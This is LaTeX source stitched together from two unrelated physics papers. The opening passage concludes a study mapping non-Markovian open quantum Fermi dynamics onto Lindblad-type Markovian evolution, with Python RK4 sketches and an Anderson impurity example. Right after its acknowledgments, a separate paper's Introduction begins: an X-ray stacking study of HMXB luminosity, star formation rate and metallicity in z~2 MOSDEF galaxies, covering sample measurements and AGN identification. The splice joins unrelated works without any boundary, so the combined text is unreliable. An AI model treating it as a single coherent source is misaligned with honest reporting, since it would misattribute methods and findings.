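    k2 = lindblad_rhs(X + 0.5 * dt * k1)
    k3 = lindblad_rhs(X + 0.5 * dt * k2)
    k4 = lindblad_rhs(X + dt * k3)
    X = X + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)

corr = np.trace(ad @ X)  # analytic: nbar * exp(i*eps*t - (gL+gR)*t/2)
```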
Finally, we extend the consideration to multi-time correlation functions of arbitrary operators $\hat O_i$ ($i\in\{1,\ldots,N\}$)
defined on the Keldysh contour (see Fig.~\ref{fig2}) as
\begin{align}
\label{corrN}
& \langle T_c\, \hat O_1(\tau_1)\,\hat O_2(\tau_2)\ldots\hat O_N(\tau_N)\rangle
\equiv
\\ &\qquad
\mbox{Tr}\bigg[T_c\,\hat O_1\,\hat O_2\ldots\hat O_N\,\hat U_c\,\hat\rho^{aux}(0)\bigg]
\nonumber
\end{align}
where $\tau_i$ are the contour variables, $T_c$ is the contour ordering operator, and
\begin{equation}
\hat U_c = T_c \exp\bigg[-i\int_c d\tau\,\hat H^{aux}(\tau)\bigg]
\end{equation}
is the contour evolution operator.
Note that the subscripts of the operators $\hat O_i$ on the right-hand side of (\ref{corrN}) indicate both the type of the operator and its position on the contour.
In Appendix~\ref{appC} we prove that the multi-time correlation functions (\ref{corrN}) can be evaluated solely from
the Markovian Lindblad-type evolution in the $S+A$ subspace of the $aux$ model,
\begin{align}
\label{corrN_EOM}
&\langle T_c\, \hat O_1(\tau_1)\,\hat O_2(\tau_2)\ldots\hat O_N(\tau_N)\rangle
=
\\ &\quad (-1)^P
\langle\langle I\vert \mathcal{O}_{\theta_1}\,\mathcal{U}_{SA}(t_{\theta_1},t_{\theta_2})\, \mathcal{O}_{\theta_2}\,
\mathcal{U}_{SA}(t_{\theta_2},t_{\theta_3})\ldots
\nonumber \\ &\qquad\qquad\qquad\qquad\quad\ldots
\mathcal{O}_{\theta_N}\mathcal{U}_{SA}(t_{\theta_N},0)
\vert \rho_{SA}(0)\rangle\rangle
\nonumber
\end{align}
Here $P$ is the number of Fermi interchanges in the permutation of the operators $\hat O_i$ by $T_c$,
$\theta_i$ are the indices of the operators $\hat O_i$ rearranged in such a way that
$t_{\theta_1}>t_{\theta_2}>\ldots >t_{\theta_N}$
($t_{\theta_i}$ is the real time corresponding to the contour variable $\tau_{\theta_i}$),
$\mathcal{O}_{\theta_i}$ are the superoperators defined in (\ref{superop}),
and $\mathcal{U}_{SA}$ is the Liouville space evolution superoperator defined in (\ref{ULiouv}).
The equivalence of the $S$ dynamics derived from the unitary evolution of models $phys$ and $aux$,
together with (\ref{rho_EOM}) and (\ref{corrN_EOM}), completes the proof that a Markovian treatment of
non-Markovian dynamics in open quantum Fermi systems is possible.
\section{Numerical illustration}\label{numres}
\begin{figure}[htbp]
\centering\includegraphics[width=\linewidth]{fig3}
\caption{\label{fig3}
Original Anderson impurity (a) and corresponding auxiliary (b) models.
}
\end{figure}
\begin{figure}[htbp]
\centering\includegraphics[width=0.6\linewidth]{fig4}
\caption{\label{fig4}
Unitary (filled circles, red) and Lindblad-type (solid line, blue) evolution in auxiliary model of Fig.~\ref{fig3}b
after connecting initially empty central site to filled $L$ and empty $R$ baths.
Shown are the level population (a) and the left (b) and right (c) currents.
See text for parameters.
}
\end{figure}
\iffalse
\begin{figure}[htbp]
\centering\includegraphics[width=0.6\linewidth]{fig5}
\caption{\label{fig5}
Unitary (filled circles, red) and Lindblad-type (solid line, blue) evolution in auxiliary model of Fig.~\ref{fig3}b
after connecting initially empty central site to filled $L$ and empty $R$ baths.
Shown are
(a) greater $\langle \hat d_\sigma(t_2)\hat d_\sigma^\dagger(t_1)\rangle$ and
(b) and lesser $\langle \hat d_\sigma^\dagger(t_2)\hat d_\sigma(t_1)\rangle$
projections of the Green's function. In the simulations $t_1$ is fixed at $0.1\, t_0$.
See text for parameters.
}
\end{figure}
\fi
Here we present a numerical simulation illustrating the equivalence of the original unitary and
the Lindblad-type Markovian treatments of an open quantum Fermi system.
We consider the Anderson impurity model (Fig.~\ref{fig3}a),
\begin{align}
\hat H &=\sum_{\sigma\in\{\uparrow,\downarrow\}}\varepsilon_0\hat d_\sigma^\dagger\hat d_\sigma + U \hat n_\uparrow\hat n_\downarrow
\\ &
+\sum_{k\in L,R}\sum_{\sigma\in\{\uparrow,\downarrow\}}\bigg(\varepsilon_k\hat c_{k\sigma}^\dagger\hat c_{k\sigma}
+ V_k \hat d^\dagger_{\sigma}\hat c_{k\sigma} + V_k^{*} \hat c_{k\sigma}^\dagger \hat d_\sigma\bigg)
\nonumber
\end{align}
where $\hat n_\sigma=\hat d_\sigma^\dagger\hat d_\sigma$.
We calculate the system evolution after connecting the initially empty site to the baths at time $t=0$.
The parameters of the simulations are (numbers are in arbitrary units of energy $E_0$):
$\varepsilon_0=0$ and $U=1$. We assume
\begin{equation}
\Gamma_K(E)=\gamma_K\frac{t_K^2}{(E-\varepsilon_0)^2+(\gamma_K/2)^2}
\end{equation}
where $\Gamma_K(E)\equiv 2\pi\sum_{k\in K}\vert V_k\vert^2\delta(E-\varepsilon_k)$
is the electron escape rate into contact $K$, $\gamma_L=\gamma_R=0.2$, and $t_L=t_R=1$.
For simplicity, we consider the high-bias regime, so that an auxiliary model with only two sites (Fig.~\ref{fig3}b)
is sufficient to reproduce the dynamics of the physical system.
In the auxiliary model we compare the unitary evolution, calculated with the numerically exact
td-DMRG~\cite{schollwock_density-matrix_2005,schollwock_density-matrix_2011,bauer_alps_2011,dolfi_matrix_2014}, to the Lindblad QME results. Time is shown in units of $t_0=\hbar/E_0$, currents in units of $I_0=E_0/\hbar$,
and $\hbar$ is set to $1$.
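The Lindblad side of such a quench can be sketched in a few lines. The fragment below is a deliberately simplified caricature, not a reproduction of the benchmark: it is spinless, ignores $U$, places all levels at zero energy, and uses hypothetical couplings; the central level is connected to one auxiliary site damped toward full and one damped toward empty, in the spirit of Fig.~\ref{fig3}b. By the particle-hole and left-right symmetry of this toy, the central population relaxes to $1/2$ and the left and right currents become equal in the steady state.

```python
import numpy as np

# Jordan-Wigner construction of three fermionic modes: (a_L, d, a_R),
# i.e. two auxiliary sites and the central level (spinless, U = 0 toy)
I2 = np.eye(2)
Z = np.diag([1.0, -1.0])
sm = np.array([[0.0, 1.0], [0.0, 0.0]])  # on-site annihilation

def kron3(o1, o2, o3):
    return np.kron(np.kron(o1, o2), o3)

aL = kron3(sm, I2, I2)
d = kron3(Z, sm, I2)
aR = kron3(Z, Z, sm)
dag = lambda o: o.conj().T

tc, gL, gR = 0.5, 1.0, 1.0  # hypothetical couplings; all levels at E = 0
H = tc * (dag(d) @ aL + dag(aL) @ d) + tc * (dag(d) @ aR + dag(aR) @ d)

def rhs(rho):
    # Eq. (rho_EOM): the full bath fills a_L, the empty bath drains a_R
    out = -1j * (H @ rho - rho @ H)
    out += gL * (dag(aL) @ rho @ aL
                 - 0.5 * (rho @ aL @ dag(aL) + aL @ dag(aL) @ rho))
    out += gR * (aR @ rho @ dag(aR)
                 - 0.5 * (rho @ dag(aR) @ aR + dag(aR) @ aR @ rho))
    return out

rho = np.zeros((8, 8), dtype=complex)
rho[0, 0] = 1.0              # quench: everything initially empty
dt = 0.01
for _ in range(3000):        # evolve to t = 30 with classical RK4
    k1 = rhs(rho)
    k2 = rhs(rho + 0.5 * dt * k1)
    k3 = rhs(rho + 0.5 * dt * k2)
    k4 = rhs(rho + dt * k3)
    rho = rho + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)

n0 = np.trace(rho @ dag(d) @ d).real         # central-level population
IL = gL * np.trace(rho @ aL @ dag(aL)).real  # inflow from the full bath
IR = gR * np.trace(rho @ dag(aR) @ aR).real  # outflow to the empty bath
```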
Figure~\ref{fig4} shows the level population, $n_0=\langle\hat n_\sigma\rangle$, as well as the left, $I_L$, and right, $I_R$, currents
in the system after the quench.
The close correspondence between the two numerical results illustrates
the exact analytical derivations presented in Section~\ref{map}.
\section{Conclusions}\label{conclude}
We consider an open quantum Fermi system $S$ coupled to a number of external Fermi baths, each at its own equilibrium
(each bath has its own electrochemical potential $\mu_i$ and temperature $T_i$).
The evolution of the model (system plus baths) is unitary.
We show that the reduced dynamics of the system $S$ in the original unitary non-Markovian model can be
exactly reproduced by the Markovian non-unitary Lindblad-type evolution of an auxiliary system,
which consists of the system $S$ coupled to a number of auxiliary modes $A$, which in turn are coupled
to two Fermi baths $L$ and $R$: one full ($\mu_L\to+\infty$) and one empty ($\mu_R\to-\infty$).
The proof proceeds in two steps: first, we show that the reduced $S$ dynamics in the physical model is
equivalent to the reduced dynamics of $S$ in the auxiliary model, when the $A$ degrees of freedom and the two baths are
traced out; second, we show that the reduced dynamics of $S$+$A$ in the auxiliary model with unitary evolution
can be exactly reproduced by a Lindblad-type Markovian evolution of $S$+$A$.
The correspondence is shown to hold for the reduced density matrix and for multi-time correlation functions defined
on the Keldysh contour. Our study is an extension of recent work on Bose systems~\cite{tamascelli_nonperturbative_2018}
to open Fermi systems and beyond the reduced density matrix alone.
Establishing the possibility of an exact mapping of reduced unitary non-Markovian dynamics to a much simpler
non-unitary Markovian Lindblad-type treatment sets a firm basis for the auxiliary quantum master equation (QME) methods
employed in, e.g., the AMEA~\cite{arrigoni_nonequilibrium_2013} and aux-DF~\cite{chen_auxiliary_2019} approaches.
We note that in practical implementations the quality of the mapping can be improved by increasing the number of
$A$ modes, as is done in advanced AMEA implementations~\cite{dorda_auxiliary_2015}, by utilizing an expansion in the
discrepancy between the physical and auxiliary hybridization functions, as is done in the dual-fermion
formulation~\cite{jung_dual-fermion_2012},
or both. The scaling performance of these two approaches to enhancing the mapping quality is a goal for future research.
\begin{acknowledgments}
We thank Max Sorantin for useful discussions.
This material is based upon work supported by the National Science Foundation under grant CHE-1565939.
\end{acknowledgments}
\section{Introduction}
\label{sec:intro}
Studies of nearby star-forming galaxies have established that the integrated X-ray luminosity ($L_{\mathrm{X}}$) of high-mass X-ray binaries (HMXBs) in a galaxy is linearly correlated with its star formation rate (SFR; \citealt{ranalli03}; \citealt{grimm03}; \citealt{persic04}; \citealt{gilfanov04a}; \citealt{lehmer10}; \citealt{mineo12}). This $L_{\mathrm{X}}$-SFR correlation exists because of the young ages and short lifetimes of HMXBs, which consist of a black hole (BH) or neutron star (NS) accreting material from a high-mass ($M>8M_{\odot}$) stellar companion. It is estimated that HMXBs form just $\sim$4-40 Myr after a starburst and remain X-ray active only for $\sim10$ Myr (\citealt{iben95}; \citealt{bodaghee12c}; \citealt{antoniou16}). \par
Several studies have found that the normalization of the $L_{\mathrm{X}}$-SFR relation evolves with redshift ($z$), increasing by about 0.5 dex in $L_{\mathrm{X}}$ at fixed SFR between $z=0-2$ (\citealt{basu13a}; \citealt{lehmer16}; \citealt{aird17}). On the contrary, \citet{cowie12} found no redshift evolution of $L_{\mathrm{X}}$/SFR. However, \citet{basu13a} argued that this apparent lack of evolution results from the fact that \citet{cowie12} did not correct their SFR proxy, UV luminosity, for dust extinction, and \citet{kaaret14} suggested that the anomalous \citet{cowie12} results may be attributed to their adoption of a spectral model that was not steep enough at hard X-ray energies. It has been suggested that the redshift evolution of $L_{\mathrm{X}}$/SFR is driven by the metallicity ($Z$) dependence of HMXB populations and the fact that, on average, HMXBs at higher redshift have lower stellar metallicities. \par
Over the past decade, binary population synthesis studies have investigated the effects of metallicity on HMXB evolution. The winds of main-sequence high-mass stars are primarily driven by radiation pressure on atomic lines. Since high-mass stars primarily emit in the UV, and metals have far more UV atomic lines than H or He, the strength of their stellar winds is determined by their stellar metallicity.
As a result, higher $Z$ stars experience higher mass loss rates, losing more mass during the course of their lifetimes than lower $Z$ stars. Therefore, the compact objects in low $Z$ binaries are expected to be more massive than ones produced by stars of similar initial mass in higher $Z$ binaries (\citealt{belczynski04}; \citealt{dray06}; \citealt{fragos13a}). Another effect of the weaker winds of lower $Z$ stars is that less angular momentum is lost from the binary, resulting in a larger fraction of HMXBs in which accretion occurs via Roche lobe overflow \citep{linden10}. Thus, lower $Z$ HMXB populations are expected to contain larger fractions of Roche lobe overflow BH HMXBs, which are typically more luminous than wind-fed NS HMXBs. There is a general consensus that larger populations of luminous HMXBs exist in lower $Z$ environments, although the strength of this trend varies between studies. Studies predict that $L_{\mathrm{X}}$/SFR may increase by factor of 2 to 10 between $Z_{\odot}$ and 0.1 $Z_{\odot}$ (\citealt{linden10}; \citealt{fragos13b}). \par
In addition to informing models of binary stellar evolution, constraining the $Z$ dependence of HMXB populations can yield insight into possible formation channels for the heavy BH binaries discovered by gravitational wave observatories \citep{abbott16}. Such BH binaries are thought to have evolved either from HMXBs in a low $Z$ environment \citep{belczynski16} or through dynamical formation in dense stellar clusters \citep{rodriguez16}. Constraining the $Z$ dependence of HMXBs is also critical for understanding their contribution to the X-ray heating of the intergalactic medium during the epoch of reionization when the Universe was extremely metal-poor (\citealt{mirabel11}; \citealt{madau17}), and informing models of the 21 cm power spectrum (e.g. \citealt{parsons14}). Furthermore, these constraints are important to accurately estimate the HMXB contamination to X-ray based searches for intermediate mass black holes (\citealt{mezcua17}). Finally, properly calibrating for the $Z$ dependence of HMXBs can improve the reliability of $L_{\mathrm{X}}$ as a SFR indicator \citep{brorby16}.
\par
There is increasing observational evidence that a larger number of HMXBs, especially ultra-luminous X-ray sources (ULXs, $L_X\gtrsim10^{39}$ erg s$^{-1}$), per unit SFR exist in nearby low $Z$ galaxies (\citealt{mapelli11}; \citealt{kaaret11}; \citealt{prestwich13}; \citealt{basu13b}; \citealt{brorby14}; \citealt{douna15}). The enhanced number of bright HMXBs cannot be accounted for by stochasticity and suggests that at very low metallicities (12+log(O/H) $< 8.0$), the production rate of HMXBs is approximately 10 times higher than in solar metallicity (12+log(O/H)=8.69) galaxies (\citealt{brorby14}; \citealt{douna15}). Using a compilation of measurements for 49 galaxies from the literature spanning $7.0<$12+log(O/H)$<9.0$, \citet{brorby16} (hereafter \citetalias{brorby16}) parametrize the $L_X$-SFR-$Z$ correlation as:
\begin{equation}
\mathrm{log}\left(\frac{L_X/SFR}{\mathrm{erg\hspace{4pt} s^{-1}/(M_{\odot}\mathrm{\hspace{4pt}yr^{-1})}}}\right) = b\times(12+\mathrm{log(O/H)}-8.69)+c
\end{equation}
where the best-fitting parameters are $b=-0.59\pm0.13$ and $c=39.49\pm0.09$. While this relation may be biased due to the mixture of sample selections for different galaxy samples taken from the literature, it provides the first observational benchmark of the $L_{\mathrm{X}}$-SFR-$Z$ relation at $z=0$. However, it has not yet been shown that the $Z$ dependence of HMXBs is the underlying cause of the observed redshift evolution of $L_{\mathrm{X}}$/SFR. \par
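Equation (1) with these best-fitting parameters can be evaluated directly; the small helper below does so (parameter values from B16 as quoted above, solar reference 12+log(O/H) = 8.69), and also illustrates the implied enhancement of $L_X$/SFR at 0.1 $Z_{\odot}$.

```python
def log_lx_per_sfr(logOH, b=-0.59, c=39.49):
    """log10[ L_X/SFR in erg s^-1 per (Msun yr^-1) ] from Eq. (1),
    with `logOH` the gas-phase oxygen abundance 12+log(O/H)."""
    return b * (logOH - 8.69) + c

# enhancement at 0.1 Z_sun (12+log(O/H) = 7.69) relative to solar: ~3.9x
boost = 10 ** (log_lx_per_sfr(7.69) - log_lx_per_sfr(8.69))
```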
We present the results of an X-ray stacking study of $z\sim2$ star-forming galaxies drawn from the MOSFIRE Deep Evolution Field (MOSDEF) survey whose goal is to test this hypothesis observationally. The MOSDEF survey obtained rest-frame optical spectra for roughly 1500 galaxies at $1.4<z<3.8$ in CANDELS fields, which have been observed to deep limits with the \textit{Chandra X-ray Observatory}; the combination of a large sample of high-redshift galaxies with robust $Z$ measurements and deep X-ray data is what makes the study of the connection between the redshift evolution and $Z$ dependence of HMXBs possible for the first time. In \S \ref{sec:mosdef}, we describe the MOSDEF survey and the measurement of galaxy properties. \S\ref{sec:chandra} describes the \textit{Chandra} X-ray data and catalogs used in this study. Sample selection and our X-ray stacking analysis are detailed in \S\ref{sec:sample} and \S\ref{sec:stacking}, respectively. In \S\ref{sec:results}, we discuss our measurement of the $Z$ dependence of $L_X$/SFR at $z\sim2$ and compare it to the local $L_X$-SFR-$Z$ relation and theoretical models. Our conclusions are presented in \S\ref{sec:conclusions}. Throughout this work, we assume a cosmology with $\Omega_m = 0.3$, $\Omega_{\Lambda} = 0.7$, and $h = 0.7$ and adopt the solar abundances from \citet{asplund09} ($Z_{\odot}=0.0142$, 12+log(O/H)$_{\odot}=8.69$).
\section{The MOSDEF Survey}
\label{sec:mosdef}
Our $z\sim2$ galaxy sample is selected from the MOSDEF survey \citep{kriek15}. This survey obtained moderate-resolution (R = 3000--3650) rest-frame optical spectra for $\sim1500$ $H$-band selected galaxies using the MOSFIRE multi-object near-IR spectrograph \citep{mclean12} on the 10-meter Keck I telescope.
MOSDEF targets are located in the CANDELS fields, where extensive multi-wavelength coverage is available (\citealt{grogin11}; \citealt{koekemoer11}). Possible MOSDEF target objects were selected from the 3D-HST photometric and spectroscopic catalogs (\citealt{skelton14}; \citealt{momcheva16}) to magnitude limits of $H= 24.0$, $H = 24.5$, and $H = 25.0$ for the low (1.37 $\leq z \leq$ 1.70), middle (2.09 $\leq z \leq$ 2.61), and high (2.95 $\leq z \leq$ 3.80) redshift intervals, respectively. These magnitude limits roughly correspond to a lower mass limit of $\sim10^9M_{\odot}$. \par
The three redshift intervals were chosen to maximize coverage of strong rest-frame optical emission lines such that they fall within atmospheric transmission windows. Hereafter we will refer to these redshift intervals as $z\sim1.5$, $z\sim2.3$, and $z\sim3.4$, respectively, and collectively refer to the galaxies in the two lowest redshift intervals as the $z\sim2$ sample.
\subsection{MOSDEF Data Reduction}
The MOSFIRE spectra were reduced using a custom automated pipeline which performs flat-fielding, subtracts sky background, cleans cosmic rays, rectifies the frames, combines all individual exposures for a given source, and calibrates the flux (see \citealt{kriek15} for details).
Slit-loss corrections were determined by modeling the HST $H$-band light distribution of galaxies and calculating the amount of light passing through the slit, as detailed in \citet{kriek15} and \citet{reddy15}.
One-dimensional science and error spectra were optimally extracted based on the algorithm of \citet{horne86} (see the Appendix in \citealt{freeman19} for details). \par
\subsection{Emission lines fluxes and spectroscopic redshifts}
Emission-line fluxes were measured by fitting Gaussian line profiles on top of a linear continuum to the one-dimensional spectra (\citealt{kriek15}; \citealt{reddy15}). The H$\alpha$ and H$\beta$ emission line fluxes were corrected for Balmer absorption using best-fit SED models, as described in \citet{reddy18}. Flux uncertainties were estimated by performing 1,000 Monte Carlo realizations of the spectrum of each object perturbed by its error spectrum and refitting the line profiles; the average line fluxes and dispersions were measured from the resulting line flux distributions. Spectroscopic redshifts were measured using the centroids of the highest signal-to-noise ratio (S/N) emission lines, typically H$\alpha$ or [O{\small III}] $\lambda$5007. In total, the MOSDEF survey obtained spectroscopic redshifts for roughly 1300 objects, including galaxies that were specifically targeted and those that were serendipitously observed.
\subsection{SED-derived M$_*$ and SFR}
\label{sec:sed}
Stellar masses were estimated by modeling the available photometric data \citep{skelton14} for each galaxy with the spectral energy distribution (SED) fitting program FAST \citep{kriek09}, adopting the MOSDEF-measured spectroscopic redshift for each galaxy. The photometric data span rest-frame UV to near-IR wavelengths for $z\sim2$ galaxies. We used the stellar population synthesis models of \citet{conroy09}, assumed a \citet{chabrier03} IMF, adopted the \citet{calzetti00} dust attenuation curve, and parametrized star-formation histories using delayed exponentially declining models of the form SFR$(t) \propto te^{-t/\tau}$, where $t$ is the time since the onset of star formation and $\tau$ is the characteristic star formation timescale. For each galaxy, the best-fitting model was found through $\chi^2$ minimization, and confidence intervals for all free parameters were calculated from the distributions of 500 Monte Carlo simulations which perturbed the input photometric data points and repeated the SED fitting procedure.
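The Monte Carlo error-estimation step described above (perturb the photometry by its uncertainties, refit, and read confidence intervals off the resulting parameter distribution) is generic; the toy sketch below illustrates it with a simple weighted linear fit standing in for the $\chi^2$ SED fit. All data and the fitted model are invented for illustration; only the procedure mirrors the text.

```python
import numpy as np

rng = np.random.default_rng(0)

# toy "photometry": a linear trend standing in for an SED, with 1-sigma errors
x = np.arange(10, dtype=float)
y_true = 2.0 * x + 1.0
y_err = np.ones_like(x)
y_obs = y_true + rng.normal(0.0, y_err)

def fit(y):
    # stand-in for the chi^2 SED fit; returns the parameter of interest
    return np.polyfit(x, y, 1)[0]  # slope

m_best = fit(y_obs)

# 500 Monte Carlo realizations: perturb the data by its errors and refit
ms = np.array([fit(y_obs + rng.normal(0.0, y_err)) for _ in range(500)])
m_lo, m_hi = np.percentile(ms, [16, 84])  # 68% confidence interval
```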
Since our goal is to study the relationship between $L_{\mathrm{X}}$/SFR and $Z$, we explored the effect that SED-fitting assumptions can have on the derived SFR, particularly those assumptions that are $Z$-dependent (see \S\ref{sec:sfrindicator}). Therefore, we also used the results of SED fits from \citet{reddy18}, which use the \citet{bruzual03} (hereafter BC03) stellar population models and vary the assumed dust attenuation curve (\citealt{calzetti00} or SMC from \citealt{gordon03}) and the stellar metallicity ($Z=0.02$ or $Z=0.004$). These SED fits assume constant SF histories, which have been shown to be appropriate for typical ($L^*$) galaxies at $z\gtrsim1.5$ by previous studies \citep{reddy12}. Prior to SED-fitting, the photometry was corrected for the contribution from the strongest emission lines in the MOSFIRE spectra, including [O II], H$\beta$, [O III], and H$\alpha$.
\subsection{H$\alpha$ SFR}
\label{sec:hasfr}
SFRs were also derived from dust-corrected H$\alpha$ luminosities. H$\alpha$ SFRs are sensitive to SF on shorter timescales and subject to partly different systematics than SED-derived SFRs. H$\alpha$ luminosities were corrected for dust attenuation using the absorption-corrected Balmer decrement (H$\alpha$/H$\beta$) as described in \citet{reddy15} and \citet{shivaei15}. These corrections assume the \citet{cardelli89} extinction curve, which Reddy et al. (in prep) find is consistent with the nebular reddening curve of MOSDEF $z\sim2$ galaxies. The dust-corrected H$\alpha$ luminosities were converted into SFRs using the calibration of \citet{hao11} assuming a \citet{chabrier03} IMF (conversion factor of $4.634\times10^{-42} M_{\odot}$ yr$^{-1}$ erg$^{-1}$ s). H$\alpha$-derived SFRs are only calculated for galaxies in which both H$\alpha$ and H$\beta$ are detected with S/N $\geq3$. \par
Since this conversion factor depends on $Z$, \citet{reddy18} derive an alternative conversion factor that is more appropriate for the MOSDEF sample based on the BC03 $Z=0.004$ (0.28 $Z_{\odot}$) model. This conversion factor is $3.236\times10^{-42} M_{\odot}$ yr$^{-1}$ erg$^{-1}$ s. \par
For our default SFR measurements, we adopt H$\alpha$ SFRs with a $Z$-dependent correction: for galaxies with 12+log(O/H)$>$8.3, we apply the H$\alpha$ luminosity conversion factor appropriate for $Z=0.02$ from \citet{hao11}, and for galaxies with lower O/H, we adopt the conversion factor for $Z=0.004$ from \citet{reddy18}. Although we consider these SFR measurements the most robust, in \S\ref{sec:sfrindicator} we discuss the impact that our choice of SFR indicator has on our results. \par
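The Balmer-decrement dust correction and $Z$-dependent conversion can be sketched as follows. The \citet{cardelli89} curve values at H$\alpha$ and H$\beta$ ($k\approx2.53$ and $k\approx3.61$) and the Case B intrinsic ratio of 2.86 are standard literature values assumed here for illustration, not quantities quoted in this section:

```python
import numpy as np

# Cardelli et al. (1989) extinction-curve values at Halpha and Hbeta
# (approximate standard values, assumed here for illustration)
K_HA, K_HB = 2.53, 3.61
BALMER_INTRINSIC = 2.86  # Case B intrinsic Halpha/Hbeta ratio

def halpha_sfr(L_ha_obs, balmer_dec, oh, oh_break=8.3,
               c_solar=4.634e-42, c_lowz=3.236e-42):
    """Dust-correct an observed Halpha luminosity [erg/s] using the
    Balmer decrement and convert to SFR [Msun/yr] with a Z-dependent
    conversion factor (Hao+11 above the O/H break, Reddy+18 below)."""
    ebv = 2.5 / (K_HB - K_HA) * np.log10(balmer_dec / BALMER_INTRINSIC)
    ebv = max(ebv, 0.0)  # do not allow negative reddening
    L_corr = L_ha_obs * 10.0 ** (0.4 * K_HA * ebv)
    conv = c_solar if oh > oh_break else c_lowz
    return conv * L_corr
```

For a galaxy with the intrinsic Balmer ratio (no reddening), the SFR reduces to the bare conversion factor times the observed luminosity.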
While the SED-derived SFRs may not fully account for dust-obscured star formation because they are based on fitting rest-frame UV to near-IR data, the H$\alpha$ SFRs are found to be in good agreement with UV+IR SFRs. \citet{shivaei16} compared the H$\alpha$ SFRs of 17 MOSDEF galaxies detected by \textit{Spitzer} MIPS and \textit{Herschel} with SED-derived SFRs based on the UV to far-IR bands, and found strong agreement, with 0.17~dex of scatter and no systematic biases.
\subsection{Metallicity}
The gas-phase metallicity of a galaxy is derived from the fluxes of emission lines originating from gas in H{\small II} regions found near sites of recent star formation. Thus, the gas-phase oxygen abundance (O/H) is often used as a proxy for the stellar metallicity of the young stellar population of a galaxy, including its HMXBs. In order to facilitate the comparison of our results to the local $L_{\mathrm{X}}$-SFR-$Z$ relation, we adopt the same O/H indicator as \citet{brorby16}, namely O3N2 (log(([O{\small III}]$\lambda$5007/H$\beta$)/([N{\small II}]$\lambda$6584/H$\alpha$))). We use the calibration of \citet{pettini04}, which is based on a sample of H{\small II} regions most of which have direct electron temperature measurements. This calibration is:
\begin{equation}
12+\mathrm{log(O/H)} = 8.73 - 0.32 \times \mathrm{O3N2}
\end{equation}
We require that the four emission lines used for the O3N2 indicator are not significantly affected by nearby skylines or too close to the edge of the spectrum to measure the line flux reliably. If one or more of the emission lines required to calculate the O3N2 flux ratio was not detected with S/N $\geq3$, then a 3$\sigma$ upper limit on the line flux was computed and used to calculate an upper or lower limit on O/H.
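The \citet{pettini04} calibration above amounts to a one-line conversion from the four measured line fluxes (a trivial sketch, with hypothetical argument names):

```python
import numpy as np

def oh_from_o3n2(f_oiii, f_hb, f_nii, f_ha):
    """Gas-phase oxygen abundance from the O3N2 indicator using the
    Pettini & Pagel (2004) calibration: 12+log(O/H) = 8.73 - 0.32*O3N2."""
    o3n2 = np.log10((f_oiii / f_hb) / (f_nii / f_ha))
    return 8.73 - 0.32 * o3n2
```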
\par
Even though we are using the same O/H indicator as \citet{brorby16}, it is possible that the O3N2 indicator evolves with redshift (\citealt{shapley15}; \citealt{sanders16a}) and that chemical abundances in galaxies at $z\sim2$ differ from the solar pattern (\citealt{steidel16}; \citealt{sanders19}), affecting the relationship between gas-phase O/H and stellar metallicity. We discuss the systematic effects on our results due to these effects in \S\ref{sec:systematics}.
\subsection{AGN Identification}
\label{sec:agn}
In order to study the X-ray binary (XRB) emission from MOSDEF galaxies, it is important to remove all known active galactic nuclei (AGN) from our sample. We identify AGN using diagnostics in multiple wavelength bands as detailed in \citet{coil15}, \citet{azadi17}, and \citet{leung17}. The AGN identification criteria are summarized below and the possible impact of AGN contamination is discussed in \S\ref{sec:systematics}.
\subsubsection{X-ray AGN}
All MOSDEF galaxies with \textit{Chandra} counterparts were classified as X-ray AGN. \citet{coil15} matched \textit{Chandra} sources detected by \texttt{wavdetect} with a false probability threshold $<4\times10^{-6}$ in at least one of four energy bands (0.5--7, 0.5--2, 2--7, and 4--7~keV) to likely multi-wavelength counterparts using the likelihood ratio method described in \citet{nandra15}; then the closest matches within 1$^{\prime\prime}$ to these counterparts were found in the 3D-HST catalogs used for MOSDEF target selection. The X-ray detected MOSDEF galaxies at $z>1.3$ have high rest-frame 2--10~keV luminosities of $L_{\mathrm{X}}>10^{41.5}$ erg s$^{-1}$ indicative of AGN emission.\footnote{In fact, all but one of the X-ray detected MOSDEF galaxies at $z>1.3$ have $L_{\mathrm{X}}>10^{42.5}$ erg s$^{-1}$.}
\par
\subsubsection{IR AGN}
Since X-ray photons are absorbed at very high column densities ($N_{\mathrm{H}}\gtrsim10^{24}$ cm$^{-2}$), X-ray surveys can miss the most heavily obscured AGN. In these obscured sources, the high-energy AGN emission is processed by dust and re-radiated at mid-infrared (MIR) wavelengths, making it possible to identify these obscured AGN based on their MIR colors. We select IR AGN using data from the Infrared Array Camera (IRAC; \citealt{fazio04}) on \textit{Spitzer} reported in the 3D-HST catalogs \citep{skelton14} and the IRAC color selection criteria defined by \citet{donley12}. \par
\subsubsection{Optical AGN}
Optical diagnostics such as the ``BPT diagram'' (\citealt{baldwin81}; \citealt{veilleux87}) can be used to identify AGN via their enhanced ratios of nebular emission lines [O{\small III}]$\lambda5007$/H$\beta$ and [N{\small II}]$\lambda6584$/H$\alpha$. However, since these diagnostics are based on the narrow components of emission lines, more detailed fitting of the H$\alpha$, H$\beta$, [O{\small III}], and [N{\small II}] emission lines is required to properly decompose the broad and narrow line components. As described in more detail in \citet{azadi17} and \citet{leung17}, the emission lines were fit with up to three Gaussian components: a narrow, a broad, and a blueshifted component representing outflows.
The broad and outflow components were only accepted if they resulted in an improved fit at $>99$\% confidence. Galaxies with significant broad lines were identified as optical AGN. \par
Using only the narrow line components, we placed galaxies on the BPT diagram. For this study, we flagged as an optical AGN any galaxy with log([N{\small II}]/H$\alpha$)$>-0.3$ and any galaxy falling above the \citet{kauffmann03} line in the BPT diagram. Not all galaxies above the \citet{kauffmann03} line are expected to be AGN, especially at $z\gtrsim2$ where galaxies are found to be offset to higher [N{\small II}]/H$\alpha$ values at fixed [O{\small III}]/H$\beta$ (\citealt{masters14}; \citealt{shapley15}; \citealt{sanders16a}; \citealt{strom17}). However, we choose to be conservative in our sample selection since even low-luminosity AGN emission may contaminate our measurements of X-ray luminosity, SFR, and O/H.
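The optical-AGN cut can be expressed compactly. The \citet{kauffmann03} demarcation, log([O{\small III}]/H$\beta$) $= 0.61/($log([N{\small II}]/H$\alpha$)$-0.05) + 1.3$, is taken from the literature and assumed here; the helper function itself is our own sketch:

```python
def is_optical_agn(log_nii_ha, log_oiii_hb):
    """Flag a galaxy as an optical AGN if log([NII]/Ha) > -0.3, or if it
    lies above the Kauffmann et al. (2003) line on the BPT diagram."""
    if log_nii_ha > -0.3:
        return True
    # Kauffmann (2003) demarcation, valid for log([NII]/Ha) < 0.05
    kauffmann = 0.61 / (log_nii_ha - 0.05) + 1.3
    return log_oiii_hb > kauffmann
```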
